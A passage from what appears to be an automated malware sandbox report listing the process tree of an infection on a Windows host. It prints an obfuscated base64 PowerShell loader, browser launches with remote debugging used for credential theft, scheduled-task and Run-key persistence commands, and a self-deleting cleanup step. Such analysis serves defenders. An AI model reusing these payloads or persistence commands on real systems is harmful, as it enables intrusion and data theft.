        C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQAyADkANAAwADsAJABiAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADEAQgBFADAALgB0AG0AcAAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAbgBFAHcALQBvAEIAagBFAEMAVAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQBbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcgBWAFgAZgBiADkAbwB3AEUASAA3AFAAWAArAEUAeABIAGgATABKAG8AQQB6AFEAZgBoAFIARgBLAGcAMwB0AFYAcQBuAFQATwBtAEIAYgBWADgAUwBEAFMAUQA0AFMAegBiAEUAagB4ADQARwB3AHcAdgA4ACsASgB6AEUAdABhAGIATwBwAFYAUABNAEQAdgBvAHQAOQA5ADkAMwBIAGQAeQBlAC8AUgBqADkAWABxADYAKwBMAFcAKwBxAHYAUAByAHcAegBtAG8AawBrAFEAawA3AEMAQwBKAEMARABQAG8ASgBzAEQAWQBrAEUAdwArAGYAbwB6AGsAQgBxAE4AYgAxAFUAQwBHAEIAUABMAGgAUgBuAFEARQBtAGMAZwBLACsAKwBtADUAVgA3AEwAZgBTAFEAMQBXAHAAUAB1AEMAUgAwAEQAQgA1AG4AZgBtAEwAcwAwAEQAbwBJAEsAYQBpAEEAZgBYAEMATABTAHQAUwAxAEQARwBQAGcAKwA2ADMASgBKAGwAYgBSACsAZQA4AFEARgBpAEUATABaAGMAZwBaAE8AbQAwAFkAYQBSAEsAeQBKAFIAcAB2AEUAZwBsAFIALwA5AEIAcABqADEASQBtAEYAVQByADcAawBrAGsAUQBQAEIANgBEAFcASQBVAGUASgBIADAAagBUAHUAYwAwADkASgBCAEgAUwBaAEsAZwBtADUASwBNAEsAaQBHAFIASwBBADIAWgBSAEEAUABIAHoAbQB6AGIANwB1AEMAegAzAE8AagBaAE4AbgBiAEwATAArAC8AeABzAEQAQQA2AE4AagA0AHYAagBEAGQAMgB2AHcAaQBlAEQAaQBtADkAagBHAEkAdQBwAE4AbgA0AEIAWQBJAEIANwBYAFkAYQAxAGsAdwBSAGwAUQBvAEgATQBvAFgAUABrAEMAcgBqAFcAZwByADAASgBRAFoAMgBMAGIAZwBxAEoARABFAEwAdQBBAHoAUABPAGEAZABvAGcAdwB2AHYAdAAzAFYARQB5AGkATABRAHAAVAB5AEIAVAA0AFQANQBGAEUAeQBOAGsAVgBuAEgAMQAvAFUAOQBGAEQASQBsAGQARQBBAHAAOQA4ADYAegArADAAeABZAEcALwB2AHkAeQBvADIAVQAyAC8AegBvAFkAbgArAEkAVQBJAEsAbQAvAHgAawBpAEwAagBZADEAUwBQAE8ATgBoAE8AbgBzAEEAWQB1AG4AVwBwAG4AagA4AFQAUQByAGgAUwBqAEIAawA3AFcAOAB2AG0AbgByAGYAOABCAGQAMABEAFEASgBMAGwAVQBuAGkAZABUAEwARwA5AFEAbABYAGcARAAvAHcAbgB5AEIAVQBLADQAQQBOAFcAVQBqADkAZQBkAEoAbQBBAFQASwA4AGYAOAB1AGwAdgBiAEoAMwBwAGkAWABCADkANwBlADkAegBXACsAbgBnAGkATgBWADEAQQBaAGwAZAAwAFoANwA5AFgAdwByAFgASgBRADgAcQBXAGoAQQArAGUAdwBtAFEAZgBiAHMANgAyADcASABXADcAUAA4AFkATABRAEIASABDAHMAYwArAGMAcgBYAEoAaQBCADQANQBSAGgANwBWAHMAMQBqAFoAWQBBAG0AUwBwAE8AeABkAFgAKwA0ADgAUwBSADgANgBnAGIAQQAzAHcAUQBpADQAdgBLAEwATAA5ADkAQgBXAHcAcABBADIAeABuAFgAVABXAGMAVwB6AHYAcgBxAEUAMQA1AFAAYgB1AEsASABGAFcAUgA3AHcANABIAEoAcgBEADYAbABVAHAAMgA5ADQARQBGAGUAOQA1AFgAOABhACsAZQBOAEYARwBBAEkAMgB4AHEARABRAC8AcgA2AE4AbABGADgAMwBEAHIASwBKAEIAMQBBAFYASQB6AEcAVABtAE0ALwA1AGgAdABEAHIAQgArAE4AawBDAGUAdQBiADQAcABhAHoAawA4AE8ANgA4AFcAUwBqAG8AMQAzAFYAZwBWAHkAMQBZADQAVgBmADkAUQBqAEkAcABRADgAawBWAEMAMQBkADkAUwBaAEgAVgBmADcAWQB5AGQAMABUAGgARgByAFMAdgBDAGwAaQBsAFoAQQBuAEwASABBAFIARwB4ADAAZgBTAGQAcQBjAHYAWgBDAG8AUwBjAG4AWgB4AGMAQwBCADYAZABrAFEAVABlADkAcwBaAFMAcQBFAGYARQBOAFAAUAAzAFQASgAxAEwAOQBYAEsAaAAxAG8AaQBzAFUAWABOAHUAVwBjAGIAMABSAGwAMABlAG0AZABOAGMAbABHADUAbgAxAGkAUwA0ADYAVgB0AC8AQQBBAD0APQAnACkALABbAHMAeQBTAFQAZQBNAC4ASQBvAC4AQwBPAG0AUAByAGUAUwBzAGkATwBOAC4AYwBPAG0AcAByAGUAUwBTAGkATwBOAE0AbwBkAGUAXQA6ADoAZABFAEMAbwBtAHAAcgBlAFMAUwApAHwAJQB7AG4ARQB3AC0AbwBCAGoARQBDAFQAIABJAE8ALgBzAHQAUgBlAGEAbQByAGUAYQBkAEUAUgAoACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQApAH0AfAAlAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApAH0AKQAgAA==
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rfqygq3y\rfqygq3y.cmdline"
        8⤵
        
        PID:4112
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D35.tmp" "c:\Users\Admin\AppData\Local\Temp\rfqygq3y\CSC5D4FE7389595495BB56469F3ADD21B2.TMP"
        9⤵
        
        PID:3036
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff84aacf208,0x7ff84aacf214,0x7ff84aacf220
        8⤵
        
        PID:3712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:3
        8⤵
        
        PID:3884
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:2
        8⤵
        
        PID:4012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=2740 /prefetch:8
        8⤵
        
        PID:212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3520,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1340
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4200,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:4508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3844,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:8
        8⤵
        
        PID:1964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5328,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:8
        8⤵
        
        PID:5260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4776,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:8
        8⤵
        
        PID:5712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=5512 /prefetch:8
        8⤵
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6408,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=6444 /prefetch:8
        8⤵
        
        PID:6240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6408,i,16201022791593538080,7263630895553382287,262144 --variations-seed-version --mojo-platform-channel-handle=6444 /prefetch:8
        8⤵
        
        PID:6260
        
        C:\ProgramData\y5phvai5f3.exe
        
        "C:\ProgramData\y5phvai5f3.exe"
        7⤵
        
        PID:6356
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:3104
        
        C:\ProgramData\y5phvai5f3.exe
        
        "C:\ProgramData\y5phvai5f3.exe"
        7⤵
        
        PID:5844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5204
        
        C:\ProgramData\p8y5fctr90.exe
        
        "C:\ProgramData\p8y5fctr90.exe"
        7⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\XPYRPORQWIL\IEUQQP.exe
        
        C:\Users\Admin\AppData\Local\Temp\XPYRPORQWIL\IEUQQP.exe
        8⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\NUKKJONINQE\SVZOYU.exe
        
        C:\Users\Admin\AppData\Local\Temp\NUKKJONINQE\SVZOYU.exe 6428
        9⤵
        Drops startup file
        Adds Run key to start application
        
        PID:5108
        
        C:\ProgramData\5f3oph4wb1.exe
        
        "C:\ProgramData\5f3oph4wb1.exe"
        7⤵
        
        PID:7108
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Edge Browser" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Chrome Google\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5380
        
        C:\Users\Admin\AppData\Roaming\Chrome Google\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Chrome Google\Client.exe"
        8⤵
        
        PID:6028
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Edge Browser" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Chrome Google\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6792
        
        C:\ProgramData\gdtrimy5xl.exe
        
        "C:\ProgramData\gdtrimy5xl.exe"
        7⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn Server /tr C:\Users\Admin\AppData\Local\Temp/Server.exe
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\5xlfk" & exit
        7⤵
        
        PID:964
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:1604
    - - C:\Users\Admin\AppData\Local\Temp\10486770101\4eTHv9F.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486770101\4eTHv9F.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:4128
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam"
        7⤵
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff848fadcf8,0x7ff848fadd04,0x7ff848fadd10
        8⤵
        
        PID:5560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1932,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:2
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --field-trial-handle=1996,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=2008 /prefetch:3
        8⤵
        
        PID:5920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --field-trial-handle=2124,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:8
        8⤵
        
        PID:5960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2848,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=2868 /prefetch:1
        8⤵
        
        PID:6132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2872,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=3120 /prefetch:1
        8⤵
        
        PID:5216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3248,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:1
        8⤵
        
        PID:5388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3264,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:2
        8⤵
        
        PID:5476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3276,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1
        8⤵
        
        PID:5824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3300,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=3956 /prefetch:2
        8⤵
        
        PID:5908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=2860,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:1
        8⤵
        
        PID:5732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\4qxa2mtn.tam" --field-trial-handle=4124,i,13971351204505954670,16411237507349236060,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
        8⤵
        
        PID:6276
    - - C:\Users\Admin\AppData\Local\Temp\10486780101\oSOnryg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486780101\oSOnryg.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Suspicious behavior: MapViewOfSection
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:4184
    - - C:\Users\Admin\AppData\Local\Temp\10486790101\blOahSM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486790101\blOahSM.exe"
        5⤵
        Checks computer location settings
        
        PID:6952
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe" x -aoa -p"vMgXworcvLkJ+c11mCsGQ" setup.7z
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7068
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe" libmmd.dll
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6112
      - C:\Users\Admin\AppData\Local\Temp\10486790101\blOahSM.exe
        
